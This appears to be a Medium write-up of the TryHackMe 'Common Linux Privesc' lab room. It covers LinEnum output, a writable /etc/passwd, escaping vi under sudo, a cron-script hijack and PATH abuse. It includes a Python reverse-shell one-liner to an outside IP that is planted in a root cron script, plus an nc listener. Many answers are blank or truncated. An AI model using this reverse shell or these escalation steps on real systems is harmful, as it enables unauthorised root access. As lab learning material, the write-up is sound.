TryHackMe(THM):Common Linux Privesc-Writeup


$/ > out_LinEnum.txt

# 2 What is the target’s hostname?

$ more out_LinEnum.txt
[-] Hostname:

#3 Look at the output of /etc/passwd how many “user[x]” are there on the system?

[-] Group memberships:
uid=1000(user1) gid=1000(user1) groups=1000(user1)
uid=1001(user2) gid=1001(user2) groups=1001(user2)
uid=1002(user3) gid=1002(user3) groups=1002(user3)
uid=1003(user4) gid=1003(user4) groups=1003(user4),0(root)
uid=120(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1004(user5) gid=1004(user5) groups=1004(user5)
uid=1005(user6) gid=1005(user6) groups=1005(user6)
uid=121(mysql) gid=131(mysql) groups=131(mysql)
uid=1006(user7) gid=0(root) groups=0(root)
uid=1007(user8) gid=1007(user8) groups=1007(user8)

#4 How many available shells are there on the system?

[-] Available shells:
# /etc/shells: valid login shells

#5 What is the name of the bash script that is set to run every 5 minutes by cron?

[-] Crontab contents:
# m h dom mon dow user command
*/5 * * * * root /home/user4/Desktop/

#6 What critical file has had its permissions changed to allow some users to write to it?

[-] Can we read/write sensitive files:
-rw-rw-r-- 1 root root 2694 Mar 6 2020 /etc/passwd
-rw-r--r-- 1 root root 1087 Jun 5 2019 /etc/group
-rw-r--r-- 1 root root 581 Apr 22 2016 /etc/profile
-rw-r----- 1 root shadow 2359 Mar 6 2020 /etc/shadow

Abusing SUID/GUID Files

#1 What is the path of the file in user3’s directory that stands out to you?

stands out to you

Exploiting Writeable /etc/passwd

#2 Having read the information above, what direction privilege escalation is this attack?

Remember the tree

#3 Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”
What is the hash created by using this command with the salt, “new” and the password “123”?

user@kali:~$ openssl passwd -1 -salt new 123

#4 Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?


Escaping Vi Editor

#2 Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?

$ sudo -l
User user8 may run the following commands on polobox:
(root) NOPASSWD: /usr/bin/vi

Exploiting Crontab

#3 What is the flag to specify a payload in msfvenom?

$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom

#5 What directory is the “” under?

grep -r "" /*
/etc/crontab:*/5 * * * * root /home/user4/Desktop/


printf “python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”10.**.**.**\”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\”/bin/sh\”,\”-i\”]);’\n” > /home/user4/Desktop/
user@kali:~$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 48904
/bin/sh: 0: can't access tty; job control turned off
# whoami

Exploiting PATH Variable

#2 Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?

user5@polobox:~$ ./script
Desktop Documents Downloads Music Pictures Public script Templates Videos

#4 Now we’re inside tmp, let’s create an imitation executable. The format for what we want to do is:
echo “[whatever command we want to run]” > [name of the executable we’re imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we’re imitating

echo "[whatever command we want to run]" > [name of the executable we're imitating]

#5 Great! Now we’ve made our imitation, we need to make it an executable. What command do we execute to do this?

I already learned in the "Learn Linux" room.
according to The syntax of this command is typically chmod <permissions> <file>.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


I’m a Japanese high school student.I’m interested in hacking. I will be a super hacker like “Spooky”, who I respect the most. I have to study hacking for that.